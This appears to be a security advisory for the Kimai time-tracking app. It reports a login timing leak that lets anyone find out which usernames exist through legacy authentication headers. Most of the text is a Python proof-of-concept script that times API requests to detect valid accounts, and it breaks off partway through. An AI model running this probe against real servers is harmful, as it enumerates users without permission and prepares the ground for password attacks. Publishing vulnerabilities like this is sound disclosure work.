src/API/Authentication/TokenAuthenticator.php calls loadUserByIdentifier() first and only invokes the password hasher (argon2id) when a user is returned. When the username does not exist, the request returns roughly 25 ms faster than when it does. The response body is the same in both cases ({"message":"Invalid credentials"}, HTTP 403), so the leak is purely timing.
The /api/* firewall has no login_throttling configured, so the probe is unbounded.
The legacy X-AUTH-USER / X-AUTH-TOKEN headers are still accepted by default in 2.x. No prior authentication, no API token, and no session cookie are required.
#!/usr/bin/env python3
"""Kimai username enumeration via X-AUTH-USER timing oracle."""
import argparse
import ssl
import statistics
import sys
import time
import urllib.error
import urllib.request
PROBE_PATH = "/api/users/me"
BASELINE_USER = "baseline_no_such_user_zzz"
DUMMY_TOKEN = "x" * 32
def probe(url, user, ctx):
req = urllib.request.Request(
url + PROBE_PATH,
headers={"X-AUTH-USER": user, "X-AUTH-TOKEN": DUMMY_TOKEN},
)
t0 = time.perf_counter()
try:
urllib.request.urlopen(req, context=ctx, timeout=10).read()
except urllib.error.HTTPError as e:
e.read()
return (time.perf_counter() - t0) * 1000.0
def median_ms(url, user, samples, ctx):
return statistics.median(probe(url, user, ctx) for _ in range(samples))
def load_candidates(path):
with open(path) as f:
return [ln.strip() for ln in f if ln.strip() and not ln.startswith("#")]
def main():
ap = argparse.ArgumentParser(description=__doc__.strip())
ap.add_argument("-u", "--url", required=True,
help="base URL, e.g. https://kimai.example")
ap.add_argument("-l", "--list", required=True, metavar="FILE",
help="one candidate username per line")
ap.add_argument("-t", "--threshold", type=float, default=15.0, metavar="MS",...
2.54.0Exploitability
AV:NAC:HPR:NUI:NScope
S:UImpact
C:LI:NA:N3.7/CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N